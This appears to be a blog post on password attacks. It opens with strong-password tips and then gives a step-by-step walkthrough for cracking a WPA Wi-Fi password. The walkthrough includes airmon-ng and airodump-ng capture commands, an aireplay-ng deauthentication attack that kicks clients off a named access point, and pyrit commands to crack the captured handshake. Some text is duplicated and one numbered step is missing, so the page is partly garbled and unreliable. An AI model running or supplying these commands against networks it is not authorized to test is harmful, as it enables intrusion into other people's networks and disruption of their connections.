Password Attacks
Password Cracking is the process of recovering passwords from data that have been stored in or transmitted by a computer system. A common approach (brute-force attack) is to repeatedly try guesses for the password.The purpose of password cracking might be to help a user recover a forgotten password (though installing an entirely new password is less of a security risk, but involves System Administration privileges), to gain unauthorized access to a system, or as a preventive measure by System Administrators to check for easily crackable passwords. On a file-by-file basis, password cracking is utilized to gain access to digital evidence for which a judge has allowed access but the particular file's access is restricted.
computer programmers have been trying to create algorithms for password cracking in less time. Most of the password cracking tools try to login with every possible combination of words. If login is successful, it means the password was found. If the password is strong enough with a combination of numbers, characters and special characters, this cracking method may take hours to weeks or months. A few password cracking tools use a dictionary that contains passwords. These tools are totally dependent on the dictionary, so success rate is lower.
Tips to create the strong password
The longer the password, the harder it is to crack: Password length is the most important factor. If you select a small password, password cracking tools can easily crack it by using few words combinations. A longer password will take a longer time in guessing. Your password must be at least 8 characters long.
Always use a combination of characters, numbers and special characters: This is another thing which makes passwords hard to crack. Password cracking tools try the combination of one by one. Have a combination of small characters, capital letters, and special characters. Suppose if you have only numbers in your password. Password cracking tools only need to guess numbers from 0-9. Here only length matters. But having a password combination of a-z, A-Z, 0-9 and other special characters with a good length will make it harder to crack. This kind of password sometimes takes weeks to crack.
Variety in passwords: One important thing you must always take care. Never use same password everywhere. Cyber criminals can steal passwords from one website and then try it on other websites too.
In case you are not sure about the strength of your password, you can check it from variety of online tools available for free. Try this official Microsoft Tool for checking the password strength.
https://www.microsoft.com/security/pc-security/password-checker.aspx
Example of strong password: AdZfL48024@ #$!
Tools Used For Password Cracking
- GPU Tools
- Online Attack
- Offline Attack
- Passing The Hash
GPU Tools
A GPU, or
graphics processing unit, is used primarily for 3-D applications. It is a
single-chip processor that creates lighting effects and transforms
objects every time a 3D scene is redrawn. These are
mathematically-intensive tasks, which otherwise, would put quite a
strain on the CPU. Lifting this burden from the CPU frees up cycles that
can be used for other jobs.
The simple reason to use a GPU instead of a CPU for password cracking is that it's much faster. It turns out that cracking passwords is a lot like mining Bitcoins, so the same reasons GPUs are faster for Bitcoin mining apply to password cracking. The short answer is that there are many more specialized chips on a GPU that perform 32-bit operations really quickly. Although a CPU can perform a lot of general-purpose calculations, the chips on a GPU can perform specific types of operations much faster, and in a much more parallel way
Hack Password Using Pyrit
Step 1: Put Wi-Fi Adapter in Monitor Mode with Airmon-Ng Let's start by putting our wireless adapter in monitor mode. Let's open a terminal and type:
The simple reason to use a GPU instead of a CPU for password cracking is that it's much faster. It turns out that cracking passwords is a lot like mining Bitcoins, so the same reasons GPUs are faster for Bitcoin mining apply to password cracking. The short answer is that there are many more specialized chips on a GPU that perform 32-bit operations really quickly. Although a CPU can perform a lot of general-purpose calculations, the chips on a GPU can perform specific types of operations much faster, and in a much more parallel way
Hack Password Using Pyrit
Step 1: Put Wi-Fi Adapter in Monitor Mode with Airmon-Ng Let's start by putting our wireless adapter in monitor mode. Let's open a terminal and type:
airmon-ng start wlan0
Note that airmon-ng has renamed your wlan0 adapter to mon0.
Step 2: Capture Traffic with Airodump-Ng Now that our wireless adapter is in monitor mode, we have the capability to see all the wireless traffic that passes by in the air. We can grab that traffic by simply using the airodump-ng command.
This command grabs all the traffic that your wireless adapter can see and displays critical information about it, including the BSSID (the MAC address of the AP), power, number of beacon frames, number of data frames, channel, speed, encryption (if any), and finally, the ESSID (what most of us refer to as the SSID). Let's do this by typing:
airodump-ng mon0
Note all of
the visible APs are listed in the upper part of the screen and the
clients are listed in the lower part of the screen.
Step 3: Airodump-Ng on To Capture Handshake Our next step is to focus our efforts on one AP, on one channel, and capture critical data from it. We need the BSSID and channel to do this. Let's open another terminal and type:
airodump-ng --bssid 08:86:30:74:22:76 -c 6 -w WPAcrack mon0
08:86:30:74:22:76 is the BSSID of the AP
-c 6 is the channel the AP is operating on
WPAcrack is the file you want to write to
mon0 is the monitoring wireless adapter* As you can see in the screenshot above, we're now focusing on capturing data from one AP with a ESSID of Belkin276 on channel 6. The Belkin276 is probably a default SSID, which are prime targets for wireless hacking as the users that leave the default ESSID usually don't spend much effort securing their AP.
Step 4: Aireplay-Ng Deauth In order to capture the encrypted password, we need to have the client authenticate against the AP. If they're already authenticated, we can de-authenticate them (kick them off) and their system will automatically re-authenticate, whereby we can grab their encrypted password in the process.
Let's open another terminal and type:
aireplay-ng --deauth 100 -a 08:86:30:74:22:76 mon0
100 is the number of de-authenticate frames you want to send
08:86:30:74:22:76 is the BSSID of the AP
mon0 is the monitoring wireless adapter
After capturing the handshake use pyrit to crack the wifi password as
In the dictionary and crunch attack, PMKs speed is near 4000 which will take lots of time to crack wifi so use the below trick to increase the speed of attack. This will provide 60000-100000 PMKs depends on client hardware.
Steps To Use Pyrit To Crack Password
1. svn checkout http://pyrit.googlecode.com/svn/trunk/ pyrit_svn
Download the pyrit file
2. cd pyrit_svn/pyrit/ ./setup.py build install
Build and install setup.py file
3. cd ..
Step back to pyrit_svn
Go to cpyrit_calpp directory
5. Edit setup.py and find VERSION = '0.4.0-dev and change to VERSION = '0.4.1-dev
also find CALPP_INC_DIRS.append(os.path.join(CALPP_INC_DIR, 'include')) and replace with CALPP_INC_DIRS.append(os.path.join(CALPP_INC_DIR, 'include/CAL'))
Save the file
6. ./setup.py build install
Build and install and edited file
7. pyrit –e MTNL create_essid
Create essid in pyrit databases
8. pyrit -i wordlist .lst import_passwords
Import the dictionary in pyrit databases
9. pyrit batch
Create table in pyrit databases
10.pyrit –r MTNL .cap attack_db
Perform attack on handshake file
No comments:
Post a Comment